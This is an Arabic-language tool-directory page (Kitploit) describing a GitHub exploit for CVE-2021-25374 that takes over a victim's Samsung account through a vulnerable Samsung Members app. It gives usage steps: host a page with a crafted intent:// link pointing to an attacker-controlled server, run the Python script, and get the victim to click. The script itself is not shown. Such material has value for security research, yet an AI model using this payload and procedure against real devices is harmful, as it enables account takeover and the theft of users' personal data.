Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/reverseclabs/cve-2021-25374_samsung-account-access
أمان أندرويدأدوات التصيدالاستغلالاستغلال تطبيقات الويبأمن الجوالالهندسة الاجتماعية
GitHubreverseclabs/cve-2021-25374_samsung-account-access

CVE-2021-25374_Samsung-Account-Access

يمكن استخدام هذا السكريبت للوصول إلى حساب سامسونج الخاص بالضحية إذا كان لديه إصدار معين من تطبيق Samsung Members مثبتًا على جهاز سامسونج الخاص به، وإذا كان جهاز الضحية من منطقة الولايات المتحدة أو كوريا.

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع
3219منذ 2 سنواتتمت المراجعة من قبل Kitploit

CVE-2021-25374 - نص الوصول إلى حساب سامسونج

يمكن استخدام هذا البرنامج النصي للوصول إلى حساب سامسونج الخاص بالضحية إذا كان لديه إصدار معين من تطبيق Samsung Members مثبتًا على جهاز سامسونج الخاص به، وإذا كان جهاز الضحية من منطقة الولايات المتحدة أو كوريا.

كيفية استخدام هذا البرنامج النصي:

  1. استضف خادم ويب واجعله يستضيف صفحة ويب تحتوي على الرابط التالي:

<a href="intent://launch?url=http://<attacker IP>:8000/yay.html&action=sso&from=ZZ&iso=ZZ#Intent;scheme=samsungrewards;package=com.samsung.android.voc;action=android.intent.action.VIEW;end;">yay click here yay</a>

ملاحظة: استبدل "<attacker IP>" بعنوان IP الذي ستقوم بتشغيل هذا البرنامج النصي منه.

  1. قم بتشغيل هذا البرنامج النصي

python3 ./samsung_account_access.py

  1. باستخدام هاتف سامسونج، تصفح خادم الويب وانقر على الرابط

  2. دع البرنامج النصي يقوم بعمله

يمكن العثور على مزيد من المعلومات حول المشكلة التي يستغلها هذا البرنامج النصي هنا:

تنزيل الأداة